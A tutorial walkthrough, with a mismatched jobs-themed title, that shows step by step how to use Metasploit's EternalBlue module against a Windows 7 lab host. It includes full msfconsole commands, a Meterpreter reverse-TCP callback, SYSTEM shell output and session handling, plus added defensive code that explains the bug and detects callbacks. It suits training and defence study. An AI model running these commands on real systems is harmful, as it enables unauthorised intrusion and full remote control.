The Most Lucrative Metasploit: Eternalblue Jobs of 2022

In April 2017, a group calling themselves the Shadow Brokers released a collection of exploit tools that they claimed had been used by the NSA. One of the tools was named EternalBlue and exploited a vulnerability in Windows SMB. Microsoft patched the underlying flaws in MS17-010; the vulnerabilities themselves are numbered CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, and CVE-2017-0148.

Attack: EternalBlue on Windows 7 SP1

The Metasploit module that exploits this vulnerability is

  • exploit/windows/smb/ms17_010_eternalblue

This Metasploit module affects only 64-bit systems running Windows 7 or Windows Server 2008 R2. The target system must be configured so that TCP/445 is accessible to the attacker. The related module

  • exploit/windows/smb/ms17_010_eternalblue_win8

affects Windows 8, 8.1, and 10.

Configuring the Metasploit Internal Database

Metasploit uses a PostgreSQL database to store its data; on Kali the database is not started by default. Though Metasploit can function without its database, it is preferable to have it available. Start the database, and ensure that it starts automatically on subsequent boots, with the following commands.

				
    root@Kali201602:~# systemctl start postgresql
    root@Kali201602:~# systemctl enable postgresql
    Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
    Executing: /lib/systemd/systemd-sysv-install enable postgresql
    insserv: warning: current start runlevel(s) (empty) of script `postgresql' overrides LSB defaults (2 3 4 5).
    insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `postgresql' overrides LSB defaults (0 1 6).
    root@Kali201602:~# msfdb init
    Creating database user 'msf'
    Enter password for new role:
    Enter it again:
    Creating databases 'msf' and 'msf_test'
    Creating configuration file in /usr/share/metasploit-framework/config/database.yml
    Creating initial database schema


These steps only need to be performed once on a Kali system; afterwards the database will be functioning correctly.

Launching Metasploit

Start the Metasploit tool msfconsole from the command line by running

				
    root@Kali201602:~# msfconsole -q
    msf >


Here the -q switch is used with msfconsole to suppress the amusing but large startup banner. Be patient; it can take a moment or two before the msf > prompt is ready. Once Metasploit is running, verify that it is connected to the database with the command

				
    msf > db_status
    [*] postgresql connected to msf


Selecting the Exploit

From Metasploit, select the EternalBlue exploit with the use command.

    msf > use exploit/windows/smb/ms17_010_eternalblue
    msf exploit(ms17_010_eternalblue) >

Notice that the command prompt has changed; now it includes the exploit module as part of the prompt.

The info command provides the user with information about the chosen exploit.

    msf exploit(ms17_010_eternalblue) > info

           Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
         Module: exploit/windows/smb/ms17_010_eternalblue
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Average
      Disclosed: 2017-03-14
    ... Output Deleted ...

    Available targets:
      Id  Name
      --  ----
      0   Windows 7 and Server 2008 R2 (x64) All Service Packs

    Basic options:
      Name                Current Setting  Required  Description
      ----                ---------------  --------  -----------
      GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
      GroomDelta          5                yes       The amount to increase the groom count by per try.
      MaxExploitAttempts  3                yes       The number of times to retry the exploit.
      ProcessName         spoolsv.exe      yes       Process to inject payload into.
      RHOST                                yes       The target address
      RPORT               445              yes       The target port (TCP)
      SMBDomain           .                no        (Optional) The Windows domain to use for authentication
      SMBPass                              no        (Optional) The password for the specified username
      SMBUser                              no        (Optional) The username to authenticate as
      VerifyArch          true             yes       Check if remote architecture matches exploit Target.
      VerifyTarget        true             yes       Check if remote OS matches exploit Target.

    Payload information:
      Space: 2000

    Description:
      This module is a port of the Equation Group ETERNALBLUE exploit,
      part of the FuzzBunch toolkit released by Shadow Brokers. There is a
      buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
      calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
      where a DWORD is subtracted into a WORD. The kernel pool is groomed
      so that overflow is well laid-out to overwrite an SMBv1 buffer.
      Actual RIP hijack is later completed in
      srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
      not trigger 100% of the time, and should be run continuously until
      triggered. It seems like the pool will get hot streaks and need a
      cool down period before the shells rain in again. The module will
      attempt to use Anonymous login, by default, to authenticate to
      perform the exploit. If the user supplies credentials in the
      SMBUser,SMBPass, and SMBDomain options it will use those instead. On
      some systems, this module may cause system instability and crashes,
      such as a BSOD or a reboot. This may be more likely with some
      payloads.
    ... Output Deleted ...
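The module description above names the bug class: a 32-bit (DWORD) size is adjusted by arithmetic that is performed and stored at 16-bit (WORD) width. The Python below is an added illustration of that class written for this page; it is not the srv.sys code and not Metasploit's code, and its field names and numbers are constructed. It shows why the adjusted count can disagree with the length that was actually validated, and what the width-correct, bounds-checked version of the same adjustment looks like.

```python
"""Constructed illustration of the bug class named in the module
description above: a 32-bit (DWORD) byte count is adjusted by a
subtraction performed and stored at 16-bit (WORD) width.

This is not the Windows srv.sys code and not Metasploit code; the
field names and numbers are made up for the demonstration.
"""

WORD_MASK = 0xFFFF
DWORD_MASK = 0xFFFFFFFF


def buggy_adjust_size(size_in_bytes: int, bytes_to_remove: int) -> int:
    """Adjust the count at WORD width.

    Only the low 16 bits of the DWORD are rewritten; any bits above
    0xFFFF in the original count survive untouched.  When the low half
    wraps, the "corrected" count comes out larger than the original.
    """
    low = (size_in_bytes & WORD_MASK) - (bytes_to_remove & WORD_MASK)
    low &= WORD_MASK                                 # 16-bit wraparound
    high = size_in_bytes & (DWORD_MASK ^ WORD_MASK)  # untouched high half
    return high | low


def fixed_adjust_size(size_in_bytes: int, bytes_to_remove: int,
                      validated_len: int) -> int:
    """Adjust the count at full DWORD width and bounds-check the result.

    validated_len is the number of bytes the caller has actually
    checked to be present in the buffer; the adjusted count must never
    exceed it.
    """
    if bytes_to_remove > size_in_bytes:
        raise ValueError("adjustment larger than declared size")
    adjusted = (size_in_bytes - bytes_to_remove) & DWORD_MASK
    if adjusted > validated_len:
        raise ValueError("adjusted size exceeds validated buffer length")
    return adjusted


def consumer_would_overread(declared_size: int, validated_len: int) -> bool:
    """A later copy that trusts declared_size walks past the validated
    data whenever declared_size exceeds validated_len."""
    return declared_size > validated_len


if __name__ == "__main__":
    # Constructed values: a list declared as 0x10000 bytes, all 0x10000 of
    # which were validated, with 0x100 bytes to be trimmed from the count.
    declared, validated, trim = 0x10000, 0x10000, 0x100
    bad = buggy_adjust_size(declared, trim)
    good = fixed_adjust_size(declared, trim, validated)
    print(f"buggy : 0x{bad:X}  overread={consumer_would_overread(bad, validated)}")
    print(f"fixed : 0x{good:X}  overread={consumer_would_overread(good, validated)}")
    # With a count below 0x10000 the two agree, which is why a defect of
    # this kind is easy to miss in ordinary testing.
    print(f"small : 0x{buggy_adjust_size(0x200, trim):X} vs "
          f"0x{fixed_adjust_size(0x200, trim, 0x200):X}")
```

The defensive lesson is the one the fixed version encodes: arithmetic on a length field has to be done at the field's full width, and the result has to be compared against the length that was actually validated before any copy trusts it. Note that the two routines agree for every count below 0x10000, so a test suite that never exercises large inputs would not notice the difference.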
				
Setting Options

Before the exploit can be run, the required options need to have values chosen. For this exploit module, the only required option that is initially unset is RHOST; this is the IP address or hostname of the target. Suppose that 10.0.15.210 is the IP address of a 64-bit Windows 7 (SP 1) system that has TCP/445 accessible to the attacker. To target this system, the attacker configures the option in the module with the set command.

				
    msf exploit(ms17_010_eternalblue) > set rhost 10.0.15.210
    rhost => 10.0.15.210

Choosing the Payload

Before the attack is launched, the attacker needs to determine what to do if the attack is successful. This is done by selecting a payload. A payload can be code that is run on the remote system, or it can be as simple as a single command. The available payloads for an exploit can be seen with the command show payloads.

				
    msf exploit(ms17_010_eternalblue) > show payloads

    Compatible Payloads
    ===================

      Name                                  Rank    Description
      ----                                  ----    -----------
      generic/custom                        normal  Custom Payload
      generic/shell_bind_tcp                normal  Generic Command Shell, Bind TCP Inline
      generic/shell_reverse_tcp             normal  Generic Command Shell, Reverse TCP Inline
      windows/x64/exec                      normal  Windows x64 Execute Command
      windows/x64/loadlibrary               normal  Windows x64 LoadLibrary Path
    ... Output Deleted ...
      windows/x64/meterpreter/reverse_http  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
      windows/x64/meterpreter/reverse_https normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
      windows/x64/meterpreter/reverse_tcp   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
    ... Output Deleted ...


The most commonly used payload is Meterpreter. Meterpreter is a program designed to be run on the target and provides the attacker with a collection of features that allow them to control their target. Meterpreter can be run in many ways; in some, the target system opens a port and waits for the attacker to connect to that port. Because this approach is easily stopped by firewalls, the usual approach is a reverse shell. In this case, the target system calls back to the attacking system; this can be done over HTTP, HTTPS, or over a custom TCP port. In this example, the attacker elects to use Meterpreter calling back over TCP.

				
    msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp


Once the payload is selected, additional options may need to be configured. The command options lists the currently selected options for the exploit.

				
    msf exploit(ms17_010_eternalblue) > options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

      Name                Current Setting  Required  Description
      ----                ---------------  --------  -----------
      GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
      GroomDelta          5                yes       The amount to increase the groom count by per try.
      MaxExploitAttempts  3                yes       The number of times to retry the exploit.
      ProcessName         spoolsv.exe      yes       Process to inject payload into.
      RHOST               10.0.15.210      yes       The target address
      RPORT               445              yes       The target port (TCP)
      SMBDomain           .                no        (Optional) The Windows domain to use for authentication
      SMBPass                              no        (Optional) The password for the specified username
      SMBUser                              no        (Optional) The username to authenticate as
      VerifyArch          true             yes       Check if remote architecture matches exploit Target.
      VerifyTarget        true             yes       Check if remote OS matches exploit Target.

    Payload options (windows/x64/meterpreter/reverse_tcp):

      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
      LHOST                      yes       The listen address
      LPORT     4444             yes       The listen port

    Exploit target:

      Id  Name
      --  ----
      0   Windows 7 and Server 2008 R2 (x64) All Service Packs


In this case, the required option LHOST still needs to be set. This is the address of the system that the target will call back to; the simplest value here is the IP address of the Kali system that is being used to launch the attack. When the attack is launched, Metasploit will automatically configure a listener on that address to handle the callback from the target.

				
    msf exploit(ms17_010_eternalblue) > set lhost 10.0.2.2
    lhost => 10.0.2.2

Note that the variable names in Metasploit are not case sensitive.

Launching the Exploit

With the required options selected, the exploit can be launched with the command exploit or the command run.

				
    msf exploit(ms17_010_eternalblue) > exploit

    [*] Started reverse TCP handler on 10.0.2.2:4444
    [*] 10.0.15.210:445 - Connecting to target for exploitation.
    [+] 10.0.15.210:445 - Connection established for exploitation.
    [+] 10.0.15.210:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.0.15.210:445 - CORE raw buffer dump (42 bytes)
    [*] 10.0.15.210:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 10.0.15.210:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 10.0.15.210:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
    [+] 10.0.15.210:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.0.15.210:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.0.15.210:445 - Sending all but last fragment of exploit packet
    [*] 10.0.15.210:445 - Starting non-paged pool grooming
    [+] 10.0.15.210:445 - Sending SMBv2 buffers
    [+] 10.0.15.210:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.0.15.210:445 - Sending final SMBv2 buffers.
    [*] 10.0.15.210:445 - Sending last fragment of exploit packet!
    [*] 10.0.15.210:445 - Receiving response from exploit packet
    [+] 10.0.15.210:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.0.15.210:445 - Sending egg to corrupted connection.
    [*] 10.0.15.210:445 - Triggering free of corrupted buffer.
    [*] Sending stage (1188415 bytes) to 10.0.15.210
    [*] Meterpreter session 1 opened (10.0.2.2:4444 -> 10.0.15.210:62487) at 2017-08-20 14:07:25 -0400
    [+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    [+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-
    [+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    meterpreter >


If the exploit reports that the connection timed out, this is often caused by a firewall on the target. For the purposes of testing the exploit, consider disabling the firewall on the Windows target.
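From the defender's side, the session line in the output above is the observable: the Windows host that just received inbound SMB traffic from 10.0.2.2 turns around and opens a connection back to 10.0.2.2 on the listener port. The Python below is an added example written for this page, not code from the original post or from Metasploit. It runs that "recent SMB client becomes the destination of a new outbound connection" check over constructed flow records; the record layout (timestamp, source IP and port, destination IP and port) is an assumption for the demo, not any product's real log format.

```python
"""Added example, not from the original page or from Metasploit: flag the
reverse-callback pattern visible in the session output above. A host
receives an inbound connection on TCP/445 and, within a short window,
opens a new outbound connection back to the same peer. The flow records
below are constructed to resemble the session above; their field layout
(timestamp src_ip src_port dst_ip dst_port) is an assumption, not a real
product's log format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records. The third line mirrors the page's session
# (10.0.2.2:4444 <- 10.0.15.210:62487, as seen from the Windows host);
# the last two lines are benign filler that must not alert.
SAMPLE_FLOWS = """\
2017-08-20T14:07:10-0400 10.0.2.2 51920 10.0.15.210 445
2017-08-20T14:07:12-0400 10.0.2.2 51921 10.0.15.210 445
2017-08-20T14:07:25-0400 10.0.15.210 62487 10.0.2.2 4444
2017-08-20T14:07:30-0400 10.0.15.7 50001 10.0.15.210 445
2017-08-20T14:20:00-0400 10.0.15.210 62600 10.0.15.7 443
"""


def parse_flows(text: str) -> list:
    """Parse whitespace-separated flow records into dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z"),
            "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport),
        })
    return flows


def find_reverse_callbacks(flows: list,
                           window: timedelta = timedelta(seconds=60),
                           smb_port: int = 445) -> list:
    """Return one alert per outbound connection that a host opens back to
    a peer that connected to its SMB port within `window` beforehand."""
    # Inbound SMB connections, keyed by (server, client).
    inbound = defaultdict(list)
    for f in flows:
        if f["dport"] == smb_port:
            inbound[(f["dst"], f["src"])].append(f["ts"])

    alerts = []
    for f in flows:
        if f["dport"] == smb_port:
            continue                 # only non-SMB connections can be callbacks
        key = (f["src"], f["dst"])   # the SMB server is now the initiator
        for smb_at in inbound.get(key, []):
            if timedelta(0) <= f["ts"] - smb_at <= window:
                alerts.append({
                    "server": f["src"], "peer": f["dst"],
                    "callback_port": f["dport"],
                    "smb_at": smb_at, "callback_at": f["ts"],
                })
                break
    return alerts


if __name__ == "__main__":
    for a in find_reverse_callbacks(parse_flows(SAMPLE_FLOWS)):
        delay = (a["callback_at"] - a["smb_at"]).seconds
        print(f"{a['server']} connected back to {a['peer']}:{a['callback_port']} "
              f"{delay}s after inbound SMB from that peer")
```

The check deliberately keys on direction and timing rather than on port 4444: that port is only Metasploit's default LPORT, as the options table above shows, and is trivially changed. Hosts that legitimately initiate connections to their own SMB clients (a domain controller, for instance) will need to be allow-listed, and the one-minute window is a starting value to tune against local traffic.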

Interacting with Meterpreter

The change in the command prompt shows that the attacker is now interacting with Meterpreter running on the remote system. The attacker can then issue commands and have them run on the remote system. To determine basic information about the system, the Meterpreter command sysinfo can be used.

				
    meterpreter > sysinfo
    Computer        : EDGEWORTH
    OS              : Windows 7 (Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : en_US
    Domain          : PLUTO
    Logged On Users : 2
    Meterpreter     : x64/windows

To determine the user ID that is being used to run Meterpreter, the command getuid can be used.

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

This exploit escalates privileges to SYSTEM on the target, but this is quite unusual; most exploits simply provide access to the target, and other exploits or techniques are needed before gaining SYSTEM.

The attacker can interact with a traditional command prompt on the remote target by issuing the shell command.

    meterpreter > shell
    Process 1816 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>

To exit the shell and return to Meterpreter, press CTRL+Z.

    C:\Windows\system32>^Z
    Background channel 1? [y/N] y


Metasploit Sessions

When the attacker is done interacting with this target, they can use the background command.

				
    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(ms17_010_eternalblue) >

The attacker is now interacting with Metasploit rather than with the instance of Meterpreter that has been deployed on the target at 10.0.15.210.

Metasploit can manage multiple sessions. To see the currently running sessions, the attacker can use the sessions command. The command help sessions shows some of the options to the sessions command.

    msf exploit(ms17_010_eternalblue) > sessions

    Active sessions
    ===============

      Id  Type                     Information                      Connection
      --  ----                     -----------                      ----------
      1   meterpreter x64/windows  NT AUTHORITY\SYSTEM @ EDGEWORTH  10.0.2.2:4444 -> 10.0.15.210:62487 (10.0.15.210)

    msf exploit(ms17_010_eternalblue) > help sessions
    Usage: sessions [options] or sessions [id]

    Active session manipulation and interaction.

    OPTIONS:

        -C <opt>  Run a Meterpreter Command on the session given with -i, or all
        -K        Terminate all sessions
        -S <opt>  Row search filter.
        -c <opt>  Run a command on the session given with -i, or all
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate sessions by session ID and/or range
        -l        List all active sessions
        -q        Quiet mode
        -r        Reset the ring buffer for the session given with -i, or all
        -s <opt>  Run a script on the session given with -i, or all
        -t <opt>  Set a response timeout (default: 15)
        -u <opt>  Upgrade a shell to a meterpreter session on many platforms
        -v        List sessions in verbose mode
        -x        Show extended information in the session table

    Many options allow specifying session ranges using commas and dashes.
    For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6

If the attacker wishes to continue interacting with the session established with 10.0.15.210, they can return to the Meterpreter command prompt with

    msf exploit(ms17_010_eternalblue) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter >


Exiting Metasploit

If the attacker has finished their work with Metasploit entirely, then from the Metasploit command prompt they can issue the command exit. If Metasploit currently has established sessions with remote systems, the attacker needs to confirm the request to exit.

				
    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(ms17_010_eternalblue) > exit
    [*] You have active sessions open, to exit anyway type "exit -y"
    msf exploit(ms17_010_eternalblue) > exit -y
    root@kali-2016-2-u:~#


Thanks